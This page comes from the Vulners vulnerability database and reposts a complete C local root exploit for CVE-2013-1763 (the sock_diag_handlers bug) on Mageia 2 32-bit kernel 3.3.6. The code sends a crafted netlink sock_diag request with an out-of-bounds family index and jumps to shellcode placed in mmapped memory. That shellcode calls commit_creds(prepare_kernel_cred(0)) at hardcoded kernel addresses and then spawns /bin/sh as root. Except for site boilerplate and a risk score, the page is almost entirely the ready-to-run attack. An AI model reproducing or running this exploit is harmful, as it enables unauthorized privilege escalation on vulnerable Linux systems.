Vulners
Lucene search
Mageia release 2 (32bit) sock_diag_handlers Local root exploit
/* Exploit Title: Mageia release 2 (32bit) sock_diag_handlers Local root exploit
Date: 22-03-2013
Exploit Author: [email protected] | @y3dips
Vendor Homepage: http://www.mageia.org/en/
Software Link: http://www.mageia.org/en/downloads/
Version: Mageia release 2 Kernel 3.3.6-desktop586-2.mga2 i686
Tested on: Mageia release 2 Kernel 3.3.6-desktop586-2.mga2 i686
CVE : 2013-1763 */
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <netinet/tcp.h>
#include <errno.h>
#include <linux/if.h>
#include <linux/filter.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <linux/sock_diag.h>
#include <linux/inet_diag.h>
#include <linux/unix_diag.h>
#include <sys/mman.h>
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
int __attribute__((regparm(3)))
kcode()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
char loncat[] = "\x55\x89\xe5\xb8\x3c\x87\x04\x08\xff\xd0\x5d\xc3\x55\x89\xe5\x81\xec\x58\x02";
/*asm("mov $kcode, %eax; call %eax");*/
int trigger() {
int socks;
unsigned long mmap_start = 0x10000;
unsigned long mmap_size= 0x120000;
void *payload;
struct {
struct nlmsghdr nlh;
struct unix_diag_req r;
} req;
socks = socket(PF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG);
if (socks < 0)
{ printf("[+] Can't create sock diag socket...\n");
return -1; }
memset(&req, 0, sizeof(req));
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
req.nlh.nlmsg_flags = NLM_F_REQUEST;
req.r.sdiag_family = 185; /*nl_table-sock_diag_handlers/4*/
payload=mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0);
if ((long)payload == -1)
{ printf("[+] Failed to mmap() at target.\n");
return -1; }
*(unsigned long *)&loncat[4] =(unsigned long)kcode;
memset((void *)mmap_start, 0x90, mmap_size);
memcpy((void *)mmap_start+mmap_size-sizeof(loncat), loncat, sizeof(loncat));
send(socks, &req, sizeof(req), 0);
}
int main()
{
printf("[+] Mageia release 2 (32bit) sock_diag_handlers Local root exploit\n");
/* Mageia release 2 Kernel 3.3.6-desktop586-2.mga2 i686*/
commit_creds = (_commit_creds) 0xc0159cd0;
prepare_kernel_cred = (_prepare_kernel_cred) 0xc0159ed0;
printf("[+] Triggering payload and Exploiting Sockz...\n");
trigger();
if(getuid()) {
printf("[+] Exploit Failed...\n");
return -1;
}
printf("[+] Got root!...\n");
execl("/bin/sh", "/bin/sh", NULL);
}
# 0day.today [2018-01-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Mar 2013 00:00Current
6.8Medium risk
Vulners AI Score6.8